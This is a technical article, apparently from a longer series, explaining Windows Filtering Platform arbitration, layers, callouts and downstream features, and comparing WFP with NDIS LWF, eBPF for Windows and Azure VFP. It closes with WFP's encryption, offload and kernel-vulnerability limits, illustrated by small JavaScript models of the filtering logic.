"'Block' overrides 'Permit'. 'Block' is final (cannot be overridden) and stops the evaluation. The packet is discarded." [@wfp-arbitration]

"Block" and "Permit" each come in two variants. The variant is set by a per-action flag, FWPS_RIGHT_ACTION_WRITE, in the callout's classify-output structure: "If the flag is set, it indicates that the action can be overridden. If the flag is absent, the action cannot be overridden" [@wfp-arbitration]. The four-cell table below is the override-policy table the BFE uses to compose per-sublayer verdicts into one layer-level action.

Action	Override allowed?	Common name	What it means
Permit + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft permit	A lower-priority sublayer's verdict (composed later by the BFE) may overturn it [@wfp-arbitration]
Permit, flag absent	No	Hard permit	Final permit; only a callout Veto in another sublayer can block. [@wfp-arbitration]
Block + `FWPS_RIGHT_ACTION_WRITE`	Yes	Soft block	A lower-priority sublayer may overturn it, but Block-over-Permit still applies if no override fires [@wfp-arbitration]
Block, flag absent	No	Hard block	Final block. Evaluation stops. Packet discarded. [@wfp-arbitration]

The soft/hard distinction is therefore a cross-sublayer property, not a within-sublayer one. Within a sublayer the rule is "first match wins"; only the composition step between sublayers consults the override flag.
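The within-sublayer rule can be sketched as follows. This is a simplified model under stated assumptions: the field names (`name`, `weight`, `match`, `action`) and the `evaluateSublayer` helper are hypothetical, and a non-terminal action is represented by the string 'Continue'. It shows only the ordering and first-match behaviour, not the override flag, which matters only when sublayer verdicts are composed.

```javascript
// Within-sublayer pass: visit filters from highest weight to lowest and stop
// at the first matching filter whose action is Permit or Block.
function evaluateSublayer(pkt, filters) {
  const ordered = [...filters].sort((a, b) =>
    a.weight === b.weight ? 0 : a.weight > b.weight ? -1 : 1);
  for (const f of ordered) {
    if (!f.match(pkt)) continue;
    if (f.action === 'Permit' || f.action === 'Block') {
      return { action: f.action, by: f.name };
    }
    // Non-terminal action: keep walking to lower-weight filters.
  }
  return { action: 'Continue', by: null };
}

const filters = [
  { name: 'allow-https', weight: 10n, match: (p) => p.port === 443, action: 'Permit' },
  { name: 'block-bad-host', weight: 50n, match: (p) => p.dst === '203.0.113.5', action: 'Block' },
  { name: 'log-only', weight: 90n, match: () => true, action: 'Continue' },
];

// block-bad-host outranks allow-https, so allow-https never runs for this packet.
console.log(evaluateSublayer({ dst: '203.0.113.5', port: 443 }, filters));
// No higher-weight terminal filter matches, so allow-https decides.
console.log(evaluateSublayer({ dst: '198.51.100.7', port: 443 }, filters));
```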

There is a fifth case. A callout that returns FWP_ACTION_BLOCK while it could have returned FWP_ACTION_PERMIT is exercising what the documentation calls a Veto. The callout has been given the opportunity to authorize a packet and has refused. That is how a third-party EDR's deep-inspection callout can refuse a flow that an in-box filter has already soft-permitted, without ever knowing the soft-permit happened: the engine offers the packet, the callout says no, and the no is final.

sequenceDiagram
    participant E as Filter engine
    participant S1 as Sublayer @ priority 100 (no matching filter)
    participant S2 as Sublayer @ priority 50 (winner: soft permit)
    participant S3 as Sublayer @ priority 10 (winner: hard permit)
    participant C as Deep-inspection callout (registered in default sublayer)
    E->>S1: evaluate highest-priority sublayer
    S1-->>E: no matching filter (Continue)
    E->>S2: evaluate next sublayer
    S2-->>E: Soft Permit (FWPS_RIGHT_ACTION_WRITE)
    Note over E: tentative layer action = Permit (overridable)
    E->>S3: evaluate next sublayer
    S3-->>E: Hard Permit (no override flag)
    Note over E: layer action = Permit (final unless a callout vetoes)
    E->>C: invoke callout for the permitted flow
    C-->>E: Veto -> Block (terminal)
    Note over E: final layer-level action = Block

Walk a worked example. An AppContainer process (an Edge tab, say, or any process launched with CreateProcess and an AppContainer SID token) tries to open an outbound TCP connection to 203.0.113.5:443. The Windows TCP/IP stack invokes the ALE shim, which classifies the connection request at FWPM_LAYER_ALE_AUTH_CONNECT_V4. The filter engine walks the sublayers at that layer from highest priority to lowest. Within each sublayer, filters fire highest-weight-first, and the first matching Permit or Block ends evaluation in that sublayer. If a vendor EDR has placed a Veto-style deep-inspection callout in its own sublayer, the callout runs and can deny the connection regardless of what any other sublayer would have done. If no filter explicitly permits the AppContainer with the matching capability SID (internetClient, internetClientServer, or privateNetworkClientServer), the "Block Outbound Default Rule" filter in the firewall's default sublayer fires last and the connection is denied [@forshaw-2021].

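{`
// Translation of the Microsoft Learn "Filter Arbitration" algorithm for the
// cross-sublayer composition pass. The within-sublayer pass (not shown)
// returns one verdict per sublayer using a first-match-wins rule on
// weight-ordered filters. composeAcrossSublayers composes those per-sublayer
// verdicts into the layer-level action using FWPS_RIGHT_ACTION_WRITE semantics.
// The constants and the function body are an illustrative reconstruction.
// Source: https://learn.microsoft.com/en-us/windows/win32/fwp/filter-arbitration

// overridable models whether FWPS_RIGHT_ACTION_WRITE is set on the verdict.
const HARD_BLOCK = { action: 'Block', overridable: false };
const SOFT_PERMIT = { action: 'Permit', overridable: true };

function composeAcrossSublayers(pkt, verdicts) {
  // Walk sublayers from highest priority to lowest.
  const ordered = [...verdicts].sort((a, b) =>
    a.priority < b.priority ? 1 : a.priority > b.priority ? -1 : 0);
  let tentative = null;
  for (const s of ordered) {
    if (!s.match(pkt)) continue;
    const v = s.verdict();
    // A hard action is final and stops evaluation.
    if (!v.overridable) return { decision: v.action, by: s.sublayer };
    // A soft action stays tentative; Block overrides a tentative Permit.
    if (tentative === null || v.action === 'Block') {
      tentative = { decision: v.action, by: s.sublayer };
    }
  }
  return tentative ?? { decision: 'Permit', by: 'no-match' };
}

// Each element is the winning verdict from one sublayer, ordered by sublayer
// priority from highest to lowest.
const sublayerVerdicts = [
  // Vendor EDR deep-inspection callout, hard block on a known-bad destination
  { sublayer: 'EDR-veto', priority: 100n, match: (pkt) => pkt.dst === '203.0.113.5', verdict: () => HARD_BLOCK },
  // Windows Defender Firewall app rule, allow-with-override
  { sublayer: 'WDF-allow', priority: 50n, match: () => true, verdict: () => SOFT_PERMIT },
  // Block Outbound Default Rule (BFE default sublayer)
  { sublayer: 'block-default', priority: 10n, match: () => true, verdict: () => HARD_BLOCK },
];

console.log(composeAcrossSublayers({ dst: '203.0.113.5' }, sublayerVerdicts));
// -> { decision: 'Block', by: 'EDR-veto' } (hard block at priority 100)

console.log(composeAcrossSublayers({ dst: '198.51.100.7' }, sublayerVerdicts));
// -> { decision: 'Block', by: 'block-default' } (soft permit overridden by hard block)
`}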

Key idea: Two competing Windows security products coexist on the same host because each one owns its own sublayer, with its own weight neighbourhood. Within a sublayer the BFE picks one winner using "first matching Permit or Block stops evaluation." Across sublayers the BFE composes those winners using "Block overrides Permit, hard actions are final, soft actions can be overridden." Pre-Vista, Windows had filters. Post-Vista, Windows has arbitration.

The engine arbitrates filters deterministically and separates condition-match (the filter) from action (the callout). What does the modern surface look like, in 2026, with two decades of features bolted on top?

6. The Modern WFP Surface

It is 2026. WFP is twenty years old, has never been replaced, and ships under more components than any other Windows networking primitive. Here is what it looks like today.

The filter engine and its kernel client

The filter engine is the same architectural piece WFP v1 shipped with: a cross-mode classifier whose kernel-mode classification path runs primarily inside NETIO.SYS and whose user-mode side runs inside the Base Filtering Engine service host process [@wfp-arch][@forshaw-2021]. Callouts and filter consumers do not link against NETIO.SYS. They link against a different binary.

fwpkclnt.sys. The kernel-mode WFP client and export driver. Callout drivers and other kernel components link against `fwpkclnt.lib`, whose in-memory module is `fwpkclnt.sys` [@wfp-arch]. The driver is the API surface that callouts use to register, classify, and call back into the engine. The classification path itself, where filters are matched and actions chosen, runs primarily in `NETIO.SYS`. The shorthand "fwpkclnt.sys *is* the filter engine" is common in blog posts and incorrect; the two binaries do different jobs.

The BFE-vs-MpsSvc split is the second confusion to clear. bfe is the Base Filtering Engine, the platform service [@wfp-about]. MpsSvc is the Windows Defender Firewall service, one consumer of the platform. The dependency goes one way: MpsSvc depends on bfe; bfe does not depend on MpsSvc.

You can verify the dependency direction on any running Windows box. Run `Get-Service bfe` and `Get-Service mpssvc`; then `Get-Service mpssvc | Select-Object -ExpandProperty ServicesDependedOn` will list BFE (among others), while the reverse query on bfe lists no dependency on mpssvc. Forshaw's 2021 post documents the same arrow from the policy side: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service" [@forshaw-2021].

Roughly sixty filtering layers

Microsoft's "Management Filtering Layer Identifiers" reference enumerates about sixty FWPM_LAYER_* GUIDs, organised by shim, direction (inbound, outbound, forward), stage (pre-IPsec, post-IPsec, discard), and IP version (v4 / v6) [@wfp-layers]. The reference page is dense, but reading it once teaches the structure. A small sample of representative layers:

FWPM_LAYER_INBOUND_IPPACKET_V4 and _V6. "Located in the receive path just after the IP header of a received packet has been parsed but before any IP header processing takes place. No IPsec decryption or reassembly has occurred" [@wfp-layers]. The earliest visibility a callout has into a received packet.
FWPM_LAYER_OUTBOUND_IPPACKET_V4 and _V6. The send-path twin.
FWPM_LAYER_IPFORWARD_V4 and _V6. The routing-decision point on a forwarding host [@wfp-layers].
FWPM_LAYER_INBOUND_TRANSPORT_V4 and _V6. After the TCP/UDP/ICMP header has been parsed but before payload delivery [@wfp-layers].
FWPM_LAYER_STREAM_V4 and _V6. The TCP stream layer where reassembled byte streams are visible [@wfp-layers].
FWPM_LAYER_DATAGRAM_DATA_V4 and _V6. Connectionless data delivery (UDP / ICMP) [@wfp-layers].
FWPM_LAYER_INBOUND_MAC_FRAME_ETHERNET. Added in Windows 8; the L2 hook the "What's New" page introduced [@wfp-whatsnew].

Most of the packet, transport, stream, datagram, and ALE authorization layers have a DISCARD twin that fires when the engine has decided to drop a packet at that point; the MAC-frame, redirect, and teardown layers do not. Callouts that need to log drops register at the DISCARD layer; callouts that need to inspect or modify register at the non-DISCARD twin [@wfp-layers].

ALE classification

The ALE shim sits across seven FWPM_LAYER_ALE_* filtering layers plus the two redirection layers introduced in the Windows 10 era [@wfp-ale-layers]:

RESOURCE_ASSIGNMENT -- local endpoint assignment (bind).
AUTH_LISTEN -- TCP listen.
AUTH_RECV_ACCEPT -- inbound TCP accept; inbound UDP/ICMP first datagram.
AUTH_CONNECT -- outbound TCP connect; outbound UDP/ICMP first datagram.
FLOW_ESTABLISHED -- the stateful "connection now exists" event.
RESOURCE_RELEASE, ENDPOINT_CLOSURE -- teardown.
CONNECT_REDIRECT, BIND_REDIRECT -- the Windows 10 redirection hooks.

Stateful per-flow context lives in the ALE shim. Application identity at each ALE layer is a normalized file name; user identity is a security descriptor [@wfp-ale]. That pair is what turns "block port 443 outbound" into "block port 443 outbound from chrome.exe running as user S-1-5-21-...."
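The identity-plus-port rule in the last sentence can be modelled as a filter whose conditions must all hold. This is a toy sketch, not the WFP API: the condition keys borrow the field identifiers FWPM_CONDITION_ALE_APP_ID, FWPM_CONDITION_ALE_USER_ID, and FWPM_CONDITION_IP_REMOTE_PORT, but the `matches` helper, the object shapes, the application path, and the SID are placeholders invented for the example. The real engine matches the user through a security-descriptor access check, which this sketch reduces to SID equality.

```javascript
// A filter matches only when every condition matches (logical AND).
const blockChrome443 = {
  name: 'block-443-from-chrome-for-one-user',
  action: 'Block',
  conditions: {
    // Normalized application path (placeholder value).
    FWPM_CONDITION_ALE_APP_ID: (v) => v.toLowerCase().endsWith('\\chrome.exe'),
    // Simplification: SID equality instead of an access check (placeholder SID).
    FWPM_CONDITION_ALE_USER_ID: (v) => v === 'S-1-5-21-1111-2222-3333-1001',
    FWPM_CONDITION_IP_REMOTE_PORT: (v) => v === 443,
  },
};

function matches(filter, fields) {
  return Object.entries(filter.conditions)
    .every(([key, test]) => key in fields && test(fields[key]));
}

const connect = {
  FWPM_CONDITION_ALE_APP_ID: '\\device\\harddiskvolume3\\apps\\chrome.exe',
  FWPM_CONDITION_ALE_USER_ID: 'S-1-5-21-1111-2222-3333-1001',
  FWPM_CONDITION_IP_REMOTE_PORT: 443,
};

console.log(matches(blockChrome443, connect)); // true
// Same port, same user, different application: the filter does not match.
console.log(matches(blockChrome443, {
  ...connect,
  FWPM_CONDITION_ALE_APP_ID: '\\device\\harddiskvolume3\\apps\\curl.exe',
})); // false
```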

In-box callouts and downstream features

The "Built-in Callout Identifiers" reference page enumerates the GUIDs of every in-box callout: the FWPM_CALLOUT_IPSEC_* family (transport, tunnel, forward-tunnel, inbound-initiate-secure, ALE-connect); FWPM_CALLOUT_WFP_TRANSPORT_LAYER_V4_SILENT_DROP and _V6_SILENT_DROP; the FWPM_CALLOUT_TCP_CHIMNEY_* callouts [@wfp-builtin-callouts]. Microsoft describes the four canonical roles a callout plays: "Deep Inspection... Packet Modification... Stream Modification... Data Logging" [@wfp-callouts].

Callout driver. A kernel driver that registers one or more callout functions with the filter engine. The engine invokes a callout's `classifyFn` when a filter at a layer specifies the callout's GUID as its action [@wfp-filter-engine]. Callouts implement one of four roles: deep inspection (read-only payload examination), packet modification, stream modification, or data logging [@wfp-callouts]. Every third-party network-security product on Windows that runs in the kernel ships a callout driver.

The downstream features are not peers of WFP. They are configurations of it.

Windows Defender Firewall with Advanced Security (WFAS). Microsoft Learn names this relationship verbatim: "The firewall application that is built into Windows Vista, Windows Server 2008, and later operating systems Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The MpsSvc service translates the WFAS rule database into WFP filters that live in the MPSSVC_WSH provider's sublayer [@forshaw-2021].
Windows IPsec. The Base Filtering Engine "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. IPsec is not a separate stack; it is a configuration of WFP plus the IKE/AuthIP keying modules.
WinNAT and Windows container networking. The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]; WinNAT, the implementation behind it, registers WFP filters to perform the translation. Windows containers use WinNAT for their default NAT switch.
Hyper-V Extensible Switch. Since Windows 8 / Server 2012, "the Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012," and the switch supports extensible-switch extensions that "bind within the extensible switch driver stack" [@hyperv-extswitch]. WFP filters and callouts can be placed at vSwitch ingress and egress [@wfp-whatsnew].
Microsoft Defender for Endpoint Network Protection. The Microsoft Learn page documents the capability: "Network Protection will block connections on all ports (not just 80 and 443)" [@mde-netprot]. The product enforces SmartScreen domain reputation across the entire process tree, not just the browser. The exact WFP-layer registration map is not publicly documented. This is one of the rare honest-disclosure moments in the WFP story: Microsoft has published the capability [@mde-netprot] but not the exact set of FWPM_LAYER_* identifiers at which Network Protection registers callouts. Community reverse engineering knows fragments of the map. Section 9 treats this as an open engineering problem.
Third-party EDR network filters. CrowdStrike Falcon, SentinelOne, Cisco Secure Endpoint, ESET, Sophos, and the rest of the EDR vendor list ship WFP callout drivers as the standard kernel-side primitive for network telemetry and policy enforcement. There is no single Microsoft document that lists them. Forshaw's 2021 Project Zero post is the closest a primary source comes to acknowledging that this is how the industry has settled [@forshaw-2021].

The textbook reference for WFP architecture is *Windows Internals, Part 2*, 7th edition, by Russinovich, Solomon, Ionescu, Yosifovich, and Allievi (Microsoft Press, 2021) [@windows-internals-7th]. The book's Networking chapter walks through TCP/IP driver internals and WFP architecture together, including the filter-engine / BFE / shim taxonomy this article has used. Treat the book as the slow-read complement to the Microsoft Learn references; the chapter does not duplicate the Learn pages, it explains why the architecture chose the shape it did. Page numbers vary by printing; cite by chapter heading.

Five downstream features on one engine. So what are the alternatives, if you want to ship a kernel-mode network filter on Windows today and do not want to use WFP?

7. Competing Approaches -- LWF, eBPF, Extensible Switch, and the Azure VFP

WFP is the L3+ answer. What else is there to attach to?

NDIS Lightweight Filter (LWF). The L2 sibling. NDIS 6.0, shipped with Vista, introduced "NDIS filter drivers. Filter drivers can monitor and modify the interaction between protocol drivers and miniport drivers. Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. LWF is the modern replacement for NDIS 5.x intermediate drivers. It sits below the protocol stack, sees raw Ethernet frames, has no application identity, and is the right choice for raw L2 work: VLAN tagging, EAPoL, packet capture (Npcap, NMNT). Choose LWF over WFP when you need pre-IP visibility and no per-process identity.

NDIS Lightweight Filter (LWF). A kernel filter driver registered with NDIS that monitors or modifies the path between a protocol driver and a miniport driver. LWF replaced NDIS 5.x intermediate drivers starting with NDIS 6.0 [@ndis-filter]. LWF drivers see Ethernet frames before any IP processing has happened. They cannot see application identity, since the OS does not yet know which process the frame belongs to.

Hyper-V Extensible Switch extensions. A specialised NDIS LWF profile. NDIS 6.30, Windows Server 2012. "The Hyper-V extensible switch supports an interface that allows instances of NDIS filter drivers (known as extensible switch extensions) to bind within the extensible switch driver stack... The Hyper-V extensible switch is supported starting with NDIS 6.30 in Windows Server 2012" [@hyperv-extswitch]. Extensions come in three roles -- capture, filter, and forwarding -- with one forwarding-extension slot per vSwitch. Choose extensible switch extensions for Hyper-V Network Virtualization, software-defined-networking overlays, or SR-IOV gating.

eBPF for Windows. A Microsoft-sponsored project to bring the Linux eBPF programming model to Windows. The GitHub README describes its scope as letting existing eBPF toolchains and APIs familiar from Linux be used on top of Windows, and frames the project as a work-in-progress [@ebpf-readme]. Three deployment modes: native ("PREVAIL verifier... bpf2c tool converts every instruction in the bytecode to equivalent C statements... built into a windows driver module (stored in a .sys file)... This is the preferred way of deploying eBPF programs" [@ebpf-readme]); JIT (user-mode service, "with HVCI enabled, eBPF programs cannot be JIT compiled, but can be run in the native mode" [@ebpf-readme]); and interpreter (debug only). The hooks the project exposes (XDP, BIND, SOCK_ADDR, SOCK_OPS, CGROUP_SOCK_ADDR) are the Linux-flavoured analogues of the WFP shim points. The v1.1.0 release, published in March 2026 and labelled "first stable" while still tagged Pre-release, "added hard/soft permit verdicts" to its accept and bind hooks -- explicitly mirroring the WFP FWPS_RIGHT_ACTION_WRITE model [@ebpf-releases]. The project's own GitHub Pages site repeats the work-in-progress framing [@ebpf-pages]. Choose eBPF for Windows for pre-stack DDoS scrubbing or cross-platform observability prototypes; the production-readiness caveat applies.

eBPF for Windows. A Microsoft-sponsored open-source project that ports the Linux eBPF execution and toolchain to Windows. The native deployment mode compiles eBPF bytecode through PREVAIL verification and the `bpf2c` translator into a signed `.sys` kernel driver, which preserves HVCI compatibility [@ebpf-readme]. As of the v1.1.0 release (March 2026), the project remains tagged Pre-release on GitHub [@ebpf-releases].

Azure VFP -- a name collision that requires disambiguation. The Azure host-SDN data plane, presented by Daniel Firestone at NSDI 2017 [@firestone-nsdi17], is called the Virtual Filtering Platform. The acronym is one letter away from WFP. Different platform. VFP is the programmable virtual switch that runs on every Azure compute host; the NSDI 2017 abstract notes that "VFP has been deployed on >1M hosts running IaaS and PaaS workloads for over 4 years" [@firestone-nsdi17]. It uses match-action tables, layers (the word "layer" appears with a different semantic from WFP's), Unified Flow Tables, and AccelNet FPGA offload via the Generic Flow Table. VFP ships with Azure, on Azure hosts. It is not customer-buildable on a Windows desktop, and Windows desktop and Server SKUs do not run it. The platforms are unrelated despite the name overlap.

Note: The Azure Virtual Filtering Platform (VFP), introduced in Firestone's NSDI 2017 paper, is the Azure host SDN data plane and shares only an acronym shape with the Windows Filtering Platform [@firestone-nsdi17]. VFP runs on Azure hosts under the Hyper-V Extensible Switch and is the layer that powers SLB, NSGs, AccelNet, and Azure Virtual Network. It is unrelated to the WFP filter engine, BFE, or fwpkclnt.sys. If the title of your inquiry contains both names, you are almost certainly looking at one or the other; the focus-premise audit in this article's source notes flagged the original input's mention of "SecureNAT" as similar terminological drift that led to the wrong product.

Approach	Layer / scope	App identity	Best for
WFP callout driver	L3+ across approximately sixty `FWPM_LAYER_*` IDs [@wfp-layers]	Yes via ALE [@wfp-ale]	App-aware on-host filtering and EDR telemetry
NDIS LWF	L2, below the protocol stack [@ndis-filter]	No	Raw L2: capture, VLAN, EAPoL
Hyper-V Extensible Switch ext	Inside the vSwitch, NDIS 6.30+ [@hyperv-extswitch]	Per-VM, not per-process	Hyper-V network virtualization, SDN overlays
eBPF for Windows	XDP / BIND / SOCK_ADDR hooks [@ebpf-readme]	Partial	Pre-stack DDoS, cross-platform observability prototypes (Pre-release)
Azure VFP	Azure host SDN; not customer-buildable [@firestone-nsdi17]	N/A	Azure-host SDN policy (Microsoft-internal)

None of these displaces WFP for the dominant on-host case (application-identity-aware, IPsec-integrated, stateful, multi-vendor-arbitrated). And all of them share one limit -- a limit that is built into the laws of network physics, not into Microsoft's roadmap.

8. Three Ceilings -- Encryption, Offload, Kernel EoP

Three ceilings sit above WFP and every alternative listed above. None is a Microsoft bug. All are structural.

The encryption ceiling

A WFP callout at the stream layer sees plaintext only if the payload was never encrypted, or if it was encrypted by a key the kernel owns (IPsec). IPsec is the one case where the kernel does hold the keys, because the IKE/AuthIP keying modules that BFE plumbs to are themselves Windows components [@wfp-about]. Every other in-process TLS or QUIC stack keeps its keys away from the kernel. TLS 1.3 and QUIC are end-to-end encrypted from the callout's point of view; the keys are inside the application's user-mode TLS library. A callout that registers at FWPM_LAYER_STREAM_V4 and reads bytes off a Chrome HTTPS connection sees ciphertext.

The case is even sharper for QUIC. QUIC runs over UDP. From the first packet, almost all of the QUIC control plane is encrypted with a key derived from the connection's initial secret. A datagram-layer callout that wants to inspect the QUIC handshake -- not the payload, just the handshake -- cannot. Microsoft's own product team has acknowledged the limit in plain English on the Defender for Endpoint Network Protection page:

Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers. -- Microsoft Defender for Endpoint, *Network Protection* [@mde-netprot]

That sentence is the encryption ceiling in Microsoft's own words. The product can block by 5-tuple (IP, port, protocol). It cannot block by hostname inside a non-Microsoft browser tab (Chrome or Firefox, say) over QUIC unless QUIC is disabled in that browser. The limit is information-theoretic: a kernel filter without the session keys cannot read the encrypted payload. No engineering changes in WFP can lift it. The fix lives in the browser or in a user-mode TLS-inspecting proxy.

The offload ceiling

The second ceiling comes from hardware. Modern NICs do work that the kernel used to do, because doing it in hardware is faster. UDP Receive Segment Coalescing Offload, the marquee feature of NDIS 6.89 in Windows 11 24H2, is the cleanest example: "URO enables network interface cards (NICs) to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@uro].

The "logically contiguous buffer" is the problem. A WFP callout written against the pre-URO semantics ("one indication at FWPM_LAYER_DATAGRAM_DATA_V4 is one UDP datagram") is silently wrong on a system where the NIC has coalesced several datagrams into one Network Buffer List. The callout that needs per-datagram inspection has to read NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO to learn the per-flow size and unfold the indication accordingly [@uro]. The mechanical bound is that work the NIC has aggregated has lost its per-packet boundary by the time the kernel sees it.

Note: A callout at FWPM_LAYER_DATAGRAM_DATA_V4 or _V6 that assumes "one NBL = one datagram" is silently wrong on Windows 11 24H2 systems with URO-capable NICs. Read the per-flow size from NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO and iterate. The change is documented in the URO reference page [@uro], but legacy callouts written before NDIS 6.89 will need an explicit audit.
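The "read the size and iterate" step reduces to simple slicing arithmetic, sketched here in user-mode JavaScript for illustration only. A real callout is kernel C and would obtain the size from NDIS_UDP_RSC_OFFLOAD_NET_BUFFER_LIST_INFO; here `segmentSize` is just a function parameter, `unfoldCoalesced` is a hypothetical helper name, and the sketch assumes every coalesced datagram has the same payload length except possibly the last.

```javascript
// Split one coalesced UDP payload into per-datagram views.
// Assumption: equal-size segments, with a possibly shorter final segment.
function unfoldCoalesced(payload, segmentSize) {
  if (!Number.isInteger(segmentSize) || segmentSize <= 0) {
    throw new RangeError('segmentSize must be a positive integer');
  }
  const datagrams = [];
  for (let offset = 0; offset < payload.length; offset += segmentSize) {
    const end = Math.min(offset + segmentSize, payload.length);
    datagrams.push(payload.subarray(offset, end)); // view, no copy
  }
  return datagrams;
}

// One 3500-byte indication that really carries three datagrams.
const coalesced = new Uint8Array(3500);
const perDatagram = unfoldCoalesced(coalesced, 1200);
console.log(perDatagram.map((d) => d.length)); // [ 1200, 1200, 1100 ]
```

A callout that skips this step would treat the 3500-byte buffer as a single datagram and apply any per-datagram logic (length checks, header parsing, rate counting) once instead of three times.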

The same shape repeats for TCP segmentation offload (TSO, LSO), receive offload (LRO, GRO), and TLS / IPsec / RDMA / VxLAN / GENEVE offload. Each one moves work to hardware. Each one weakens the kernel-filter assumption that "every packet flows past every layer."

The kernel attack surface

The third ceiling is the one that drives the CVE cadence. Every callout is a kernel module [@wfp-callouts]. Every byte that crosses the Fwpm* user-to-kernel boundary is a potential primitive for an elevation-of-privilege exploit [@nvd-2023-29368][@nvd-2024-38034]. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free in the WFP code path with a CVSS base of 7.0 (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.0, and an impact sub-score of 5.9 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow in the same family of code paths with a CVSS base of 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), an exploitability sub-score of 1.8, and an impact sub-score of 5.9 [@nvd-2024-38034].

The CVSS vector difference is worth reading carefully. Attack complexity dropped from AC:H in the 2023 record to AC:L in the 2024 record, and the exploitability sub-score rose from 1.0 to 1.8. The 2024 bug is easier to weaponise [@nvd-2023-29368][@nvd-2024-38034]. Without speculating about the trend across a longer time series, the direction of travel in attack complexity between these two anchor CVEs is "down, not up."
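The scores quoted above follow from the two vectors by the CVSS v3.1 base-score equations. The sketch below implements those equations for Scope: Unchanged vectors only, using the metric weights from the CVSS v3.1 specification; the function names and the object shape it returns are choices made for this example, and it is meant as a check on the arithmetic, not as a complete CVSS calculator.

```javascript
// CVSS v3.1 base score, restricted to Scope: Unchanged vectors.
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  PR: { N: 0.85, L: 0.62, H: 0.27 }, // values for Scope: Unchanged
  UI: { N: 0.85, R: 0.62 },
  CIA: { H: 0.56, L: 0.22, N: 0 },
};

// Spec-defined Roundup: smallest one-decimal value >= x, via integer math.
function roundup(x) {
  const i = Math.round(x * 100000);
  return i % 10000 === 0 ? i / 100000 : (Math.floor(i / 10000) + 1) / 10;
}

function baseScore(vector) {
  const m = Object.fromEntries(vector.split('/').map((kv) => kv.split(':')));
  if (m.S !== 'U') throw new Error('this sketch handles Scope: Unchanged only');
  const exploitability =
    8.22 * WEIGHTS.AV[m.AV] * WEIGHTS.AC[m.AC] * WEIGHTS.PR[m.PR] * WEIGHTS.UI[m.UI];
  const iss =
    1 - (1 - WEIGHTS.CIA[m.C]) * (1 - WEIGHTS.CIA[m.I]) * (1 - WEIGHTS.CIA[m.A]);
  const impact = 6.42 * iss;
  const base = impact <= 0 ? 0 : roundup(Math.min(impact + exploitability, 10));
  const oneDecimal = (x) => Math.round(x * 10) / 10; // display rounding for sub-scores
  return { base, exploitability: oneDecimal(exploitability), impact: oneDecimal(impact) };
}

const cve2023 = baseScore('AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H');
const cve2024 = baseScore('AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H');
console.log(cve2023); // { base: 7, exploitability: 1, impact: 5.9 }
console.log(cve2024); // { base: 7.8, exploitability: 1.8, impact: 5.9 }
```

The only input that differs is the attack-complexity weight (0.44 for AC:H, 0.77 for AC:L), which is enough to move the exploitability sub-score from 1.0 to 1.8 and the base score from 7.0 to 7.8 while the impact sub-score stays at 5.9.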

There is a structural variant of the same story that does not require any memory-safety bug at all. In August 2021, Forshaw published a Project Zero post titled "Understanding Network Access in Windows AppContainers." The post documents a default-WFP-policy configuration that allows certain low-privilege AppContainer processes to reach the network without any of the capability SIDs (internetClient, internetClientServer, privateNetworkClientServer) that the AppContainer documentation suggests are required [@forshaw-2021]. The associated Project Zero issue, 2207, was marked WontFix by Microsoft; the press coverage at SecurityAffairs reproduces the advisory body verbatim: "The default rules for the WFP connect layers permit certain executables to connect TCP sockets in AppContainers without capabilities leading to elevation of privilege... Eventually an AC process will match the 'Block Outbound Default Rule' rule if nothing else has which will block any connection attempt" [@securityaffairs-2021]. The bug is a policy composition bug, not a code bug. It exists in the way the in-box sublayers, filter weights, and default rules interact -- which is precisely the surface this article spent Section 5 explaining.

Key idea: WFP's hardest limits are not engineering choices Microsoft can rewrite. They are information-theoretic (a kernel filter without session keys cannot read what is encrypted), mechanical (hardware offloads exist to amortise work the kernel filter would have done, and aggregation destroys per-packet ground truth), and structural (every callout is a kernel module, and every Fwpm* call crosses a user-to-kernel ABI). The BFE elevation-of-privilege CVE class is the running cost of a platform sophisticated enough to host every downstream feature Windows ships.

Three ceilings. Is there a structural fix for any of them, or is this what the platform looks like forever?

9. Open Problems -- Where the Engineering Lives

Six questions are live right now. None of them has a clean answer.

QUIC inspection in the kernel. The current best partial result is to block QUIC by 5-tuple and rely on a browser's HTTP/3 fallback to TLS over TCP, where in-box inspection still works. The Defender for Endpoint Network Protection page documents the workaround verbatim: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Anything deeper than 5-tuple inspection on QUIC requires a user-mode proxy that terminates the QUIC connection and re-originates it, which moves the problem out of WFP.

Microsoft Defender for Endpoint's exact WFP-layer registration map. Publicly undocumented. Microsoft has published the capability and the limitations [@mde-netprot] but not the precise set of FWPM_LAYER_* GUIDs that Network Protection registers callouts at. Community reverse engineering knows fragments. A definitive map would let third-party EDR vendors avoid sublayer-priority conflicts with Defender. Whether Microsoft publishes one is a product-roadmap question.

